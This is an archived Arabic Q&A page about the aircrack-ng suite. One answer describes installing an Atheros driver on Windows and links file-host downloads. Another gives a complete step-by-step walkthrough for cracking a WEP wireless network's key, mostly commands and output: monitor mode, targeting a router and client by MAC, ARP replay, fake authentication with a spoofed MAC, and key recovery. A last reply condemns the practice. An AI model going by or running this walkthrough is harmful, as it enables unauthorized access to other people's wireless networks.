الرئيسية > السؤال
السؤال
شرح عن برامج aircrack-ng طريقه العمل
المواقع والبرامج 23‏/4‏/2010 تم النشر بواسطة ريدان العريقي.
الإجابات
1 من 4
هسه راح نبدي نشرح بالصور او خطوة خطوة (( تاتي تواتي ))

اول شغله راح انغير تعريف LanCard مالت D-Link او نزرع بداخله ملف الاثيروس شوفو الصورة الي جوه
انروح على MyCmputer او كلك ايمن عليك او نختار Properties


او بعدين انروح على HardWare او وراها على Device Manrger


وراها راح انروح على ديفايس الان كارد D-Link او اندوس عليه كلك ايمن او نختار Updatr Driver

او نتبع الصور الي جوه حت انغير التعريف حتى ندخل ملف الاثروس بالتعريف



وراها ندوس HaveDisck حتى انروح على ملف الاثروس

اندوس على كلمة Browse حتى انروح على ملف الاثروس









وهسة تكدر تشتغل على برنامج Aircrack

لتحميل ملف الاثيروس من هنا
http://www.4shared.com/file/55104407...heros4229.html
لتحميل برنامج Aircrack من هنا
http://www.4shared.com/file/58702041...g-091-win.html

وتلبية لطلب الاخ العزيز الفيصل هذا رابط اخر لملف الاثيروس

http://arabsh.com/dc79ss1h5ln7.html

مع تحياتي لكم
8‏/9‏/2010 تم النشر بواسطة صانع الأحلام.
2 من 4
مافي فيديو
21‏/7‏/2011 تم النشر بواسطة بدون اسم.
3 من 4
اود ان أضع بين أيديكم شرح عن كيفية كسر حماية شبكة وايرلس نوع الحماية تبعها
web
وهذه الحماية سهلة جدا للكسر وليست صعبه كالـ wpa wpa/wpa2
لأنها تعتمد على تجميع باكيتس وكسرهم .. ومعرفه كلمة السر
طيب .. أولا يجب أن نفهم عدة أشياء
أن هذا التشفير فيه نوعين ..
اما 64 بت .. او 128 بت ..
بحيث ان ال128 بت يجب ان تكون كلمة السر مكونة من 23 حرف .. وما بعتقد أنيستخدمها أحد .. بل الأكثر يستخدم 64 بت .. اللتي تكون مكونة من 5 أو 10أحرف
وهذا سهل للجميع حفظه فهم يستخدمونها ..
لعشاق النس واللصق ذكر الحقوق
m0j4h3d
vbhacker.net/vb
فإن كسر 128 نفس كسر ال 64
لكن يجب الحصول على باكيتس أكثر
طيب .. نبدأ بالشرح ...
الأدوات المستخدمة هي حزمة
aircrack
ويمكن تحميلها من موقعها الرسمي وتثبيتها
والمهم اننا نعمل على بيئة لينوكس توزيعه باك تراك4 لأن كل شي نحتاجه موجود فيها
طيب .. نبدأ
أولا نعرف اسم كرت الوايرلس اللي عندنا بالجهاز .. سواء لابتوب او جهاز ثابت
فنكتب بالشيل
iwconfig
فنجد مكتوب بجنبه
IEEE 802.11bg
انا عندي اسمه
wlan0
اوك .. الأن
نشغل المونيتور على اسم الكرت .. يعني المراقبة

airmon-ng start wlan0

كود:
root@bt:~# airmon-ng start wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon0)
اشتغل على الـ mon0
قد يسأل البعض ليش على mon0 مش على الأساسي wlan0
اقول حسب نوع الكرت .. وهل هو حجديث او لا .. لان بإمكانك ان تشغل مراقبة على أكثر من قناة .. وهو يعطيك اسم جديد


الأن نشغل الـ
airodump-ng
ونكتب بعدها اسم الكرت اللي تفعل عليه المراقبة وهو الأن mon0
لكي نرى الراوترات المحيطة بنا
فنكتب بالشيل

كود:
airodump-ng mon0
فنرى

كود:
CH 11 ][ Elapsed: 4 s ][ 2010-03-12 13:11

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1F:9F:D3:1F:EB -54 16 0 0 7 54 WEP WEP mine

BSSID STATION PWR Rate Lost Packets Probes

00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -48 0 - 1 17 9
ما يهمنا .. هو
اسم الراوتر والقناة اللي تشتغل عليها والماك أدريس للراوتر .. والماك أدريس للمتصل بها

طيب الأن
اسم الراوتر هو
mine
القناة اللي تستخدمها هي
7
الماك أدريس للراوتر
00:1F:9F:D3:1F:EB
الماك أدريس للجهاز المتصل
00:13:CE:4F:B5:51

اوك .. الأن نوقف المراقبة عن الكرت mon0 and wlan0

airmon-ng stop mon0
airmon-ng stop wlan0

كود:
root@bt:~# airmon-ng stop mon0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
mon0 Atheros ath5k - [phy0] (removed)

root@bt:~# airmon-ng stop wlan0


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
(monitor mode disabled)
وذلك لكي نعيد تشغيل المراقبة على نفس القناة .. (تنجح بدون ذلك .. لكن الأفضل عملها)

نشغل المراقبة على القناة 7 اللي عليها الراوتر

airmon-ng start wlan0 7

كود:
root@bt:~# airmon-ng start wlan0 7


Interface Chipset Driver

wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon0)
أخبرنا أنه تم تفعيل المراقبة على اسم
mon0
اوك .. الأن كل شي تمام
نبدأ بعمل airodump-ng
نكتب بالشيل

كود:
airodump-ng -c 7 --bssid 00:1F:9F:D3:1F:EB -w wwww mon0
فيطلعلنا

كود:
CH 7 ][ Elapsed: 0 s ][ 2010-03-12 13:22

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:1F:9F:D3:1F:EB -46 100 32 7 2 7 54 WEP WEP mine

BSSID STATION PWR Rate Lost Packets Probes

00:1F:9F:D3:1F:EB 00:13:CE:4F:B5:51 -47 0 - 5 488 29
الأن نشغل الaireplay-ng
حتى نجمع الباكيتس

فنكتب

كود:
aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
-3 ... arprequest تجميع طلبات الباكيتس
-b بعدها الماك أدريس للراوتر
-h بعدها الماك أدريس للمتصل
mon0 اسم الكرت اللي نراقب عليه

يطلعلنا هكذا

كود:
root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:13:CE:4F:B5:51
13:26:55 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7
Saving ARP requests in replay_arp-0312-132655.cap
You should also start airodump-ng to capture replies.
ad 325 packets (got 0 ARP requests and 93 ACKs), sent 0 packets...(0 pps)
الأن المهم هو الأر بي ARP وتجميعهم .. ولزيادة ذلك
نشغل ال aireplay-ng لإرسال باكتس زائفة للراوتر وتجميع packets and ARP
فنكتب بالشيل

كود:
aireplay-ng -1 7000 -e mine -a 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
-e اسم الراوتر
-a الماك أدريس للراوتر
-h الماك أدريس للجهاز المتصل

فيبدأ بإرسال باكيتس زائفة

ثم ننتقل للشاشة الموجود فيها تجميع الباكيتس
فنجد أنهم زادو

كود:
root@bt:~# aireplay-ng -3 -b 00:1F:9F:D3:1F:EB -h 00:13:CE:4F:B5:51 mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:19:5B:D1:E4:36) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:13:CE:4F:B5:51
13:31:20 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 7
Saving ARP requests in replay_arp-0312-133120.cap
You should also start airodump-ng to capture replies.
ad 537517 packets (got 19757 ARP requests and 211372 ACKs), sent 224454 packets...(499 pps)
ونلاحظ زيادة بالباكيتس إلى 537517 .. وزيادة بالـ ARP إلى 19757

والأن أصبح لدينا عدد جيد من الباكيتس والأر بي

فنشغل الـ
aircrack-ng
ونكتب بشاشة مستقلة

كود:
aircrack-ng -z -b 00:1F:9F:D3:1F:EB ww*.cap
-z أي أنها ويب
-b وبعدها الماك أدريس للراوتر
ww*.cap ملف الكاب

فيبدأ بالكسر


كود:
Aircrack-ng 1.0 r1668


[00:00:53] Tested 17287 keys (got 16942 IVs)

KB depth byte(vote)
0 0/ 3 12(27136) 6F(25088) A2(24064) 8D(23808) 46(23552) C1(23296) 0E(23040) 70(23040) 87(23040)
1 4/ 6 70(23296) 43(23040) 44(23040) 94(23040) C8(23040) 2B(22784) D1(22784) F5(22784) 34(22528)
2 0/ 9 23(25856) 65(25088) 93(25088) 9B(24576) A3(23808) 08(23552) 40(23552) 4F(23296) 64(23296)
3 0/ 16 12(24832) AB(23040) 30(23040) 8B(22528) 81(22528) 35(22272) 75(22272) AA(22016) C7(22016)
4 5/ 8 31(24064) 87(23296) 1A(23296) B0(22784) A0(22528) D9(22528) 41(22272) F4(22272) 6C(21760)

KEY FOUND! [ 12:31:23:12:31 ]
Decrypted correctly: 100%
نلاحظ أنه كسره وعرفنا كلمة السر
KEY FOUND! [ 12:31:23:12:31 ]
وهي بين الـ :
يعني هي
1231231231


إلى هنا نكون انتهينا >> ان شاء الله أكون وفقت في الشرح .. وما توفيقي إلا من الله
22‏/7‏/2011 تم النشر بواسطة Ansezz.
4 من 4
هذا حرام و ما اعجب الا من قول البعض و ما توفيقي الا بالله او قول الاخرين له بارك الله فيك و انا اقول لا بارك الله في هذا العمل
2‏/7‏/2012 تم النشر بواسطة حسني البورظان (Thaer Alimari).
قد يهمك أيضًا
شرح كيفية التعامل مع برامج النت بالتفصيل؟
اريد جميع برامج شركة ادوبي مع شرح عمل البرنامج
فيرس الكمبيوتر
هل برامج الحماية تعطل برامج التورنت أو توقفها عن العمل؟
ابحث عن سريال برامج Throttle 6
تسجيل الدخول
عرض إجابات Google في:: Mobile | كلاسيكي
©2014 Google - سياسة الخصوصية - مساعدة